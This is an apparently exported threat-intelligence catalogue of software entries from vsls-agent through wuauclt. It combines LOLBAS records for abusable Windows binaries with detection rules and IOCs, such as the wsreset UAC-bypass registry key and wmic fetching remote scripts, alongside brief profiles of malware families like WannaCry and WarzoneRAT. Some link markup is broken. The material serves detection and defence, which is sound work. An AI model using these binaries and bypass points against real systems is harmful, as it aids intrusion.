This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Agent for Visual Studio Live Share (Code Collaboration)

Author: Jimmy (@bohops)

Paths: * c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe

Detection: * Sigma: [proc_creation_win_vslsagent_agentextensionpath_load.yml]([vsls-agent.exe - LOLBAS Project(/references/325eab54-bcdd-4a12-ab41-aaf06a0405e9)]</sup>

The tag is: misp-galaxy:software="vsls-agent"

vstest.console.exe - Associated Software

<sup>[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]</sup>

The tag is: misp-galaxy:software="vstest.console.exe - Associated Software"

vstest.console

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: VSTest.Console.exe is the command-line tool to run tests

Author: Onat Uzunyayla

Paths: * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe * C:\Program Files (x86)\Microsoft Visual Studio\2022\TestAgent\Common7\IDE\CommonExtensions\Microsoft\TestWindow\vstest.console.exe

Detection: * IOC: vstest.console.exe spawning unexpected processes<sup>[[vstest.console.exe - LOLBAS Project](/references/70c168a0-9ddf-408d-ba29-885c0c5c936a)]</sup>

The tag is: misp-galaxy:software="vstest.console"

Wab.exe - Associated Software

<sup>[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]</sup>

The tag is: misp-galaxy:software="Wab.exe - Associated Software"

Wab

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows address book manager

Author: Oddvar Moe

Paths: * C:\Program Files\Windows Mail\wab.exe * C:\Program Files (x86)\Windows Mail\wab.exe

Detection: * Sigma: [registry_set_wab_dllpath_reg_change.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml) * IOC: WAB.exe should normally never be used<sup>[[Wab.exe - LOLBAS Project](/references/c432556e-c7f9-4e36-af7e-d7bea6f51e95)]</sup>

The tag is: misp-galaxy:software="Wab"

WanaCrypt0r - Associated Software

The tag is: misp-galaxy:software="WanaCrypt0r - Associated Software"

WCry - Associated Software

The tag is: misp-galaxy:software="WCry - Associated Software"

WanaCry - Associated Software

The tag is: misp-galaxy:software="WanaCry - Associated Software"

WanaCrypt - Associated Software

The tag is: misp-galaxy:software="WanaCrypt - Associated Software"

WannaCry

[WannaCry](https://app.tidalcyber.com/software/6e7d1bcf-a308-4861-8aa5-0f4c6f126b0a) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.<sup>[[LogRhythm WannaCry](https://app.tidalcyber.com/references/305d0742-154a-44af-8686-c6d8bd7f8636)]</sup><sup>[[US-CERT WannaCry 2017](https://app.tidalcyber.com/references/349b8e9d-7172-4d01-b150-f0371d038b7e)]</sup><sup>[[Washington Post WannaCry 2017](https://app.tidalcyber.com/references/bbf9b08a-072c-4fb9-8c3c-cb6f91e8940c)]</sup><sup>[[FireEye WannaCry 2017](https://app.tidalcyber.com/references/34b15fe1-c550-4150-87bc-ac9662547247)]</sup>

The tag is: misp-galaxy:software="WannaCry"

Ave Maria - Associated Software

<sup>[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)]</sup><sup>[[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]</sup>

The tag is: misp-galaxy:software="Ave Maria - Associated Software"

Warzone - Associated Software

The tag is: misp-galaxy:software="Warzone - Associated Software"

WarzoneRAT

[WarzoneRAT](https://app.tidalcyber.com/software/cfebe868-15cb-4be5-b7ed-38b52f2a0722) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.<sup>[[Check Point Warzone Feb 2020](https://app.tidalcyber.com/references/c214c36e-2bc7-4b98-a74e-529aae99f9cf)]</sup><sup>[[Uptycs Warzone UAC Bypass November 2020](https://app.tidalcyber.com/references/1324b314-a4d9-43e7-81d6-70b6917fe527)]</sup>

The tag is: misp-galaxy:software="WarzoneRAT"

WastedLocker

[WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) is a ransomware family attributed to [Indrik Spider](https://app.tidalcyber.com/groups/3c7ad595-1940-40fc-b9ca-3e649c1e5d87) that has been used since at least May 2020. [WastedLocker](https://app.tidalcyber.com/software/0ba6ee8d-2b29-4980-8e55-348ea05f00ad) has been used against a broad variety of sectors, including manufacturing, information technology, and media.<sup>[[Symantec WastedLocker June 2020](https://app.tidalcyber.com/references/061d8f74-a202-4089-acae-687e4f96933b)]</sup><sup>[[NCC Group WastedLocker June 2020](https://app.tidalcyber.com/references/1520f2e5-2689-428f-9ee4-05e153a52381)]</sup><sup>[[Sentinel Labs WastedLocker July 2020](https://app.tidalcyber.com/references/5ed4eb07-cc90-46bc-8527-0bb59e1eefe1)]</sup>

The tag is: misp-galaxy:software="WastedLocker"

Waterbear

[Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030) is modular malware attributed to [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.<sup>[[Trend Micro Waterbear December 2019](https://app.tidalcyber.com/references/bf320133-3823-4232-b7d2-d07da9bbccc2)]</sup>

The tag is: misp-galaxy:software="Waterbear"

WEBC2

[WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) is a family of backdoor malware used by [APT1](https://app.tidalcyber.com/groups/5307bba1-2674-4fbd-bfd5-1db1ae06fc5f) as early as July 2006. [WEBC2](https://app.tidalcyber.com/software/f228af8f-8938-4836-9461-c6ca220ed7c5) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. <sup>[[Mandiant APT1 Appendix](https://app.tidalcyber.com/references/1f31c09c-6a93-4142-8333-154138c1d70a)]</sup><sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="WEBC2"

WellMess

[WellMess](https://app.tidalcyber.com/software/20725ec7-ee35-44cf-bed6-91158aa03ce4) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29]([CISA WellMess July 2020(https://app.tidalcyber.com/references/40e9eda2-51a2-4fd8-b0b1-7d2c6deca820)]</sup><sup>[[PWC WellMess July 2020](https://app.tidalcyber.com/references/22794e37-3c55-444a-b659-e5a1a6bc2da0)]</sup><sup>[[NCSC APT29 July 2020](https://app.tidalcyber.com/references/28da86a6-4ca1-4bb4-a401-d4aa469c0034)]</sup>

The tag is: misp-galaxy:software="WellMess"

Wevtutil

[Wevtutil](https://app.tidalcyber.com/software/2bcbcea6-192a-4501-aab1-1edde53875fa) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.<sup>[[Wevtutil Microsoft Documentation](https://app.tidalcyber.com/references/25511dde-9e13-4e03-8ae4-2495e9f5eb5e)]</sup>

The tag is: misp-galaxy:software="Wevtutil"

Wfc.exe - Associated Software

<sup>[[Wfc.exe - LOLBAS Project](/references/a937012a-01c8-457c-8808-47c1753e8781)]</sup>

The tag is: misp-galaxy:software="Wfc.exe - Associated Software"

Wfc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).

Author: Jimmy (@bohops)

Paths: * C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe

The tag is: misp-galaxy:software="Wfc"

WhisperGate

[WhisperGate](https://app.tidalcyber.com/software/791f0afd-c2c4-4e23-8aee-1d14462667f5) is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022.<sup>[[Cybereason WhisperGate February 2022](https://app.tidalcyber.com/references/464d9cac-04c7-4e57-a5d6-604fba90a982)]</sup><sup>[[Unit 42 WhisperGate January 2022](https://app.tidalcyber.com/references/3daa8c9e-da17-4eda-aa0d-df97c5de8f64)]</sup><sup>[[Microsoft WhisperGate January 2022](https://app.tidalcyber.com/references/e0c1fcd3-b7a8-42af-8984-873a6f969975)]</sup>

The tag is: misp-galaxy:software="WhisperGate"

Wiarp

The tag is: misp-galaxy:software="Wiarp"

WCE - Associated Software

The tag is: misp-galaxy:software="WCE - Associated Software"

Windows Credential Editor

The tag is: misp-galaxy:software="Windows Credential Editor"

WindTail

The tag is: misp-galaxy:software="WindTail"

Winexe

[Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is a lightweight, open source tool similar to [PsExec](https://app.tidalcyber.com/software/73eb32af-4bd3-4e21-8048-355edc55a9c6) designed to allow system administrators to execute commands on remote servers. <sup>[[Winexe Github Sept 2013](https://app.tidalcyber.com/references/7003e2d4-83e5-4672-aaa9-53cc4bcb08b5)]</sup> [Winexe](https://app.tidalcyber.com/software/65d5b524-0e84-417d-9884-e2c501abfacd) is unique in that it is a GNU/Linux based client. <sup>[[Überwachung APT28 Forfiles June 2015](https://app.tidalcyber.com/references/3b85fff0-88d8-4df6-af0b-66e57492732e)]</sup>

The tag is: misp-galaxy:software="Winexe"

Wingbird

[Wingbird](https://app.tidalcyber.com/software/3e70078f-407e-4b03-b604-bdc05b372f37) is a backdoor that appears to be a version of commercial software [FinFisher](https://app.tidalcyber.com/software/41f54ce1-842c-428a-977f-518a5b63b4d7). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://app.tidalcyber.com/groups/3a660ef3-9954-4252-8946-f903f3f42d0c) in a May 2016 campaign. <sup>[[Microsoft SIR Vol 21](https://app.tidalcyber.com/references/619b9cf8-7201-45de-9c36-834ccee356a9)]</sup> <sup>[[Microsoft NEODYMIUM Dec 2016](https://app.tidalcyber.com/references/87c9f8e4-f8d1-4f19-86ca-6fd18a33890b)]</sup>

The tag is: misp-galaxy:software="Wingbird"

winget.exe - Associated Software

<sup>[[winget.exe - LOLBAS Project](/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]</sup>

The tag is: misp-galaxy:software="winget.exe - Associated Software"

winget

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Package Manager tool

Author: Paul Sanders

Paths: * C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe

Detection: * IOC: winget.exe spawned with local manifest file * IOC: Sysmon Event ID 1 - Process Creation * Analysis: [https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html](https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html) * Sigma: [proc_creation_win_winget_local_install_via_manifest.yml]([winget.exe - LOLBAS Project(/references/5ef334f3-fe6f-4cc1-b37d-d147180a8b8d)]</sup>

The tag is: misp-galaxy:software="winget"

WinMM

The tag is: misp-galaxy:software="WinMM"

Winnti for Linux

[Winnti for Linux](https://app.tidalcyber.com/software/e384e711-0796-4cbc-8854-8c3f939faf57) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://app.tidalcyber.com/groups/6932662a-53a7-4e43-877f-6e940e2d744b). The Windows variant is tracked separately under [Winnti for Windows]([Chronicle Winnti for Linux May 2019(https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]</sup>

The tag is: misp-galaxy:software="Winnti for Linux"

Winnti for Windows

[Winnti for Windows](https://app.tidalcyber.com/software/245c216e-41c3-4dec-8b23-bfc7c6a46d6e) is a modular remote access Trojan (RAT) that has been used likely by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to as the same name, [Winnti Group]([Kaspersky Winnti April 2013(https://app.tidalcyber.com/references/2d4834b9-61c4-478e-919a-317d97cd2c36)]</sup><sup>[[Microsoft Winnti Jan 2017](https://app.tidalcyber.com/references/6b63fac9-4bde-4fc8-a016-e77c8485fab7)]</sup><sup>[[Novetta Winnti April 2015](https://app.tidalcyber.com/references/cbe8373b-f14b-4890-99fd-35ffd7090dea)]</sup><sup>[[401 TRG Winnti Umbrella May 2018](https://app.tidalcyber.com/references/e3f1f2e4-dc1c-4d9c-925d-47013f44a69f)]</sup>. The Linux variant is tracked separately under [Winnti for Linux]([Chronicle Winnti for Linux May 2019(https://app.tidalcyber.com/references/e815e47a-c924-4b03-91e5-d41f2bb74773)]</sup>

The tag is: misp-galaxy:software="Winnti for Windows"

WinRAR

According to its website, WinRAR is a "data compression, encryption and archiving tool for Windows", which is designed to process RAR and ZIP files.<sup>[[WinRAR Website](/references/ad620d61-108c-4bb0-a897-02764ea9a903)]</sup> It is known to be abused by threat actors in order to archive (compress) files prior to their exfiltration from victim environments.<sup>[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]</sup>

The tag is: misp-galaxy:software="WinRAR"

winrm.vbs - Associated Software

<sup>[[winrm.vbs - LOLBAS Project](/references/86107810-8a1d-4c13-80f0-c1624143d057)]</sup>

The tag is: misp-galaxy:software="winrm.vbs - Associated Software"

winrm

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Script used for manage Windows RM settings

Author: Oddvar Moe

Paths: * C:\Windows\System32\winrm.vbs * C:\Windows\SysWOW64\winrm.vbs

The tag is: misp-galaxy:software="winrm"

WinSCP

WinSCP is a tool used to facilitate file transfer using Secure Shell (SSH) File Transfer Protocol (FTP) for Microsoft Windows.<sup>[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]</sup>

The tag is: misp-galaxy:software="WinSCP"

Winword.exe - Associated Software

<sup>[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]</sup>

The tag is: misp-galaxy:software="Winword.exe - Associated Software"

Winword

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Microsoft Office binary

Author: Reegun J (OCBC Bank)

Paths: * C:\Program Files\Microsoft Office\root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office\Office16\winword.exe * C:\Program Files\Microsoft Office\Office16\winword.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office\Office15\winword.exe * C:\Program Files\Microsoft Office\Office15\winword.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office14\winword.exe * C:\Program Files\Microsoft Office\Office14\winword.exe * C:\Program Files (x86)\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe * C:\Program Files\Microsoft Office\Office12\winword.exe

Detection: * Sigma: [proc_creation_win_office_arbitrary_cli_download.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml) * IOC: Suspicious Office application Internet/network traffic<sup>[[Winword.exe - LOLBAS Project](/references/6d75b154-a51d-4541-8353-22ee1d12ebed)]</sup>

The tag is: misp-galaxy:software="Winword"

Wiper

[Wiper](https://app.tidalcyber.com/software/627e05c2-c02e-433e-9288-c2d78bce156f) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. <sup>[[Dell Wiper](https://app.tidalcyber.com/references/be6629ef-e7c6-411c-9bd2-34e59062cadd)]</sup>

The tag is: misp-galaxy:software="Wiper"

Wireshark

Wireshark is a popular open-source packet analyzer utility.

The tag is: misp-galaxy:software="Wireshark"

Wlrmdr.exe - Associated Software

<sup>[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]</sup>

The tag is: misp-galaxy:software="Wlrmdr.exe - Associated Software"

Wlrmdr

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Logon Reminder executable

Author: Moshe Kaplan

Paths: * c:\windows\system32\wlrmdr.exe

Detection: * Sigma: [proc_creation_win_lolbin_wlrmdr.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml) * IOC: wlrmdr.exe spawning any new processes<sup>[[Wlrmdr.exe - LOLBAS Project](/references/43bebdc3-3072-4a3d-a0b7-0b23f1119136)]</sup>

The tag is: misp-galaxy:software="Wlrmdr"

Wmic.exe - Associated Software

<sup>[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>

The tag is: misp-galaxy:software="Wmic.exe - Associated Software"

Wmic

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI

Author: Oddvar Moe

Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe

Detection: * Sigma: [image_load_wmic_remote_xsl_scripting_dlls.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml) * Sigma: [proc_creation_win_wmic_xsl_script_processing.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml) * Sigma: [proc_creation_win_wmic_squiblytwo_bypass.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml) * Sigma: [proc_creation_win_wmic_eventconsumer_creation.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml) * Elastic: [defense_evasion_suspicious_wmi_script.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml) * Elastic: [persistence_via_windows_management_instrumentation_event_subscription.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Splunk: [xsl_script_execution_with_wmic.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml) * Splunk: [remote_wmi_command_attempt.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml) * Splunk: [remote_process_instantiation_via_wmi.yml](https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml) * Splunk: [process_execution_via_wmi.yml](https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: Wmic retrieving scripts from remote system/Internet location * IOC: DotNet CLR libraries loaded into wmic.exe * IOC: DotNet CLR Usage Log - wmic.exe.log<sup>[[LOLBAS Wmic](/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]</sup>

The tag is: misp-galaxy:software="Wmic"

Woody RAT

[Woody RAT](https://app.tidalcyber.com/software/1f374a54-c839-5139-b755-555c66a21c12) is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.<sup>[[MalwareBytes WoodyRAT Aug 2022](https://app.tidalcyber.com/references/5c2ecb15-14e9-5bd3-be5f-628fa4e98ee6)]</sup>

The tag is: misp-galaxy:software="Woody RAT"

WorkFolders.exe - Associated Software

<sup>[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]</sup>

The tag is: misp-galaxy:software="WorkFolders.exe - Associated Software"

WorkFolders

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Work Folders

Author: Elliot Killick

Paths: * C:\Windows\System32\WorkFolders.exe

Detection: * Sigma: [proc_creation_win_susp_workfolders.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml) * IOC: WorkFolders.exe should not be run on a normal workstation<sup>[[WorkFolders.exe - LOLBAS Project](/references/42cfa3eb-7a8c-482e-b8d8-78ae5c30b843)]</sup>

The tag is: misp-galaxy:software="WorkFolders"

Wscript.exe - Associated Software

<sup>[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]</sup>

The tag is: misp-galaxy:software="Wscript.exe - Associated Software"

Wscript

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used by Windows to execute scripts

Author: Oddvar Moe

Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe

Detection: * Sigma: [proc_creation_win_wscript_cscript_script_exec.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml) * Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml) * Sigma: [image_load_susp_script_dotnet_clr_dll_load.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml) * Elastic: [defense_evasion_unusual_dir_ads.toml](https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml) * Elastic: [command_and_control_remote_file_copy_scripts.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml) * Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml) * Splunk: [wscript_or_cscript_suspicious_child_process.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml) * BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules) * IOC: Wscript.exe executing code from alternate data streams * IOC: DotNet CLR libraries loaded into wscript.exe * IOC: DotNet CLR Usage Log - wscript.exe.log<sup>[[Wscript.exe - LOLBAS Project](/references/6c536675-84dd-44c3-8771-70120b413db7)]</sup>

The tag is: misp-galaxy:software="Wscript"

Wsl.exe - Associated Software

<sup>[[Wsl.exe - LOLBAS Project](/references/c147902a-e8e4-449f-8106-9e268d5367d8)]</sup>

The tag is: misp-galaxy:software="Wsl.exe - Associated Software"

Wsreset.exe - Associated Software

<sup>[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]</sup>

The tag is: misp-galaxy:software="Wsreset.exe - Associated Software"

Wsreset

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used to reset Windows Store settings according to its manifest file

Author: Oddvar Moe

Paths: * C:\Windows\System32\wsreset.exe

Detection: * Sigma: [proc_creation_win_uac_bypass_wsreset_integrity_level.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml) * Sigma: [proc_creation_win_uac_bypass_wsreset.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml) * Sigma: [registry_event_bypass_via_wsreset.yml#](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml#) * Splunk: [wsreset_uac_bypass.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml) * IOC: wsreset.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command * IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen<sup>[[Wsreset.exe - LOLBAS Project](/references/24b73a27-f2ec-4cfa-a9df-59d4d4c1dd89)]</sup>

The tag is: misp-galaxy:software="Wsreset"

wt.exe - Associated Software

<sup>[[wt.exe - LOLBAS Project](/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]</sup>

The tag is: misp-galaxy:software="wt.exe - Associated Software"

wt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Terminal

Author: Nasreddine Bencherchali

Paths: * C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe

Detection: * Sigma: [proc_creation_win_windows_terminal_susp_children.yml]([wt.exe - LOLBAS Project(/references/bbdd85b0-fdbb-4bd2-b962-a915c23c83c2)]</sup>

The tag is: misp-galaxy:software="wt"

wuauclt.exe - Associated Software

<sup>[[wuauclt.exe - LOLBAS Project](/references/09229ea3-ffd8-4d97-9728-f8c683ef6f26)]</sup>

The tag is: misp-galaxy:software="wuauclt.exe - Associated Software"

wuauclt

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Windows Update Client

Author: David Middlehurst

Paths: * C:\Windows\System32\wuauclt.exe

